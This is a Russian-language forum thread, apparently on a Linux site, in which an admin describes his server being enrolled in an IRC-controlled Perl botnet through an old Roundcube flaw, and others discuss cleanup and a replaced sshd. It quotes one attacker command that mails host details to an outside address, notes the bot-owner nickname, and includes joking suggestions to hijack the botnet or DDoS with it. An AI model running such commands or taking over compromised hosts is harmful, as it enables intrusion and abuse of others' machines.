а там их 1000шт. Что делать?

Перехватывать управление, что ж ещё :)

Писать заявление в ми^w полицию

Попробуй изучить протокол работы. Можно как перехватить управление, так и разослать всем хозяевам этих серверов сообщения о том что их взломали.

Поднимай службы сервака с чистого листа, исключая возможность закидывания бота из бэкапа.

Если ковбой - можешь попытаться выяснить, как работает бот и придушить гадину прицельно, не снося систему.

В любом случае ещё нужно определить путь проникновения заразы и закрыть брешь.

Есть скрипт с исходником же =) Но владеть, а тем более пользовать не хочу.

Свою систему я уже подлатал.

Есть скрипт с исходником же =) Но владеть, а тем более пользовать не хочу.

Тогда попробуй послать команду самоуничтожения, что бы скрипт удалил себя и завершился. Представляю как припечёт автору ботнета. Скрипт всё же сохрани, а лучше выложи на LOR для препарирования.

А в чём уязвимость была?

А можно подробнее про механизмы взлома и работы скрипта?

а где скрипт?

Бочку. Пости скрипт суда и адрес ирц.

Похоже он выполнил операцию уничтожения мозга ТСа :)

Перехвати и заддось кого-нибудь.

Уязвимость была в древнем Roundcube. Чувак писал файлы от www-data в /tmp. Умудрился даже скомпилить два сишника. Один из них умел выполнять bash команды с удаленного хоста. Второй майнил биткоины. Скрипт пока не выложу, изучаю...

Как разберусь, что надо сказать ботам в чате, есть идея задосить сам IRC сервак XD

Мамку свою заддось.

Скрипт пока не выложу, изучаю

Выкладывай, изучим вместе.

А может ты жулик

А может жулик это ты? //Без пруфца ты сам знаешь кто кукаретник.

Давай IP

127.0.0.1

Перехвати управление, зарабатывай деньги ботнетом.

Хотя 1000 шт мелковато.

Подробное описание: http://www.pentarh.com/wp/2009/02/13/large-growing-botnet-detected/

Оно?

Спасибо! Сейчас смотрю в окно чата, зашел админ. Пишет:

cd /tmp
.say echo a > a.txt;cat a.txt | mail -s "`uname -ns`" blabla@hotmail.com

И в моей /tmp создается этот файл.... Ушел искать.

Может быть.

И что?

Бот позволяет выполнять команду на зараженной машине. Значит надо выполнить правильную команду чтобы грохнуть на всех машинах его.

А можно подробнее про механизмы взлома и работы скрипта ?

телепатирую (~98%) - подбор пароля пользователя. Потому как, если бы серьёзнее что, не нашёл бы. А если нашёл бы, не нуждался бы в ответах на такие вопросы. ;-)

Читай, все описано как ломали. По ссылке тоже самое.

Скрипт является ботом, управляется по IRC.

То есть должно быть еще что-то на хосте для коннекта к IRC, при чем, я так понимаю, что-то особое?

Запусти однострочник.

perl скрипт висит в процессах с именем 'xauditd'. Запускается как можно узнать из ссылки - кроном.

Видимо кода мы тут так и не дождёмся?

Я про внутренность спрашивал. Если у меня нет ничего, чем коннектиться к IRC, у меня же эта шняга не взлетит? Я вот о чем.

Ну тык perl скрипт это и делает после запуска. Вот скрипт, на его основе сделан тот что у меня: http://forum.antichat.ru/archive/index.php?t-66336.html

Читай, все описано как ломали. По ссылке тоже самое.

Всё равно не особенно серьёзное. :-)
Хотя, кто знает... Если какие-то локальные уязвимости эксплуатируются, возможно, при их наличии, умеет и хорошо ховаться.

А почему ты не покажешь свой?

У него однострочник.

Уязвимость была в древнем Roundcube
Что делать?

Осилить SELinux на дефолтовых политиках.

Попробуй изучить протокол работы. Можно как перехватить управление, так и разослать всем хозяевам этих серверов сообщения о том что их взломали.

Даааа :) Сообщение о том, что взломали :))

# Dont change nothing if u dont know what u do! #

Так умиляет эта строчка.

В общем чтобы боты в канале сожрали команду, надо быть юзером с никнеймом bong

надо быть юзером с никнеймом bong

По ходу хозяин ботнета в теме =)

_____________________$______________________
____________________$$$_____________________
____________________$$$_____________________
__$________________$$$$$_______________$____
___$$______________$$$$$_____________$$_____
____$$$____________$$$$$___________$$$______
_____$$$$$_________$$$$$________$$$$$_______
______$$$$$$$______$$$$$_____$$$$$$$________
________$$$$$$$____$$$$$___$$$$$$$__________
___________$$$$$____$$$___$$$$$_____________
__$$$$$$$______$$$__$$$__$$$______$$$$$$$___
______$$$$$$$$____$$_$_$$____$$$$$$$$_______
__________$$$$$$$$$_$$$_$$$$$$$$$___________
_________________$$$_$_$$$__________________
_____________$$$$$___$___$$$$$______________
_____________________$______________________

> Зашел на IRC сервер в канал, а там их 1000шт.

> ...

> Второй майнил биткоины.

Опа. С тыщи компов можно миллионы рублей в месяц получать.

Размечтался.

Ага, сразу в ФБР и NW3C:

The IC3 accepts online Internet crime complaints from either the actual victim or from a third party to the complainant.

майнинг идёт на cpu

Подменили sshd, переустанавливать удаленно стремно, управление нельзя потерять. Что можно сделать?

А всё СТИМ виноват

Не лез бы куда не надо ничего этого не было бы :(

Восстанавливать из бекапа, сделанного до даты взлома. Ну и сразу после этого кубик снести и делать харденинг.

Поменял sshd на родной. Что примечательно, у родного и подмененного, размер файла байт в байт. Но MD5 не сходятся. А кубик я сразу уже подключил.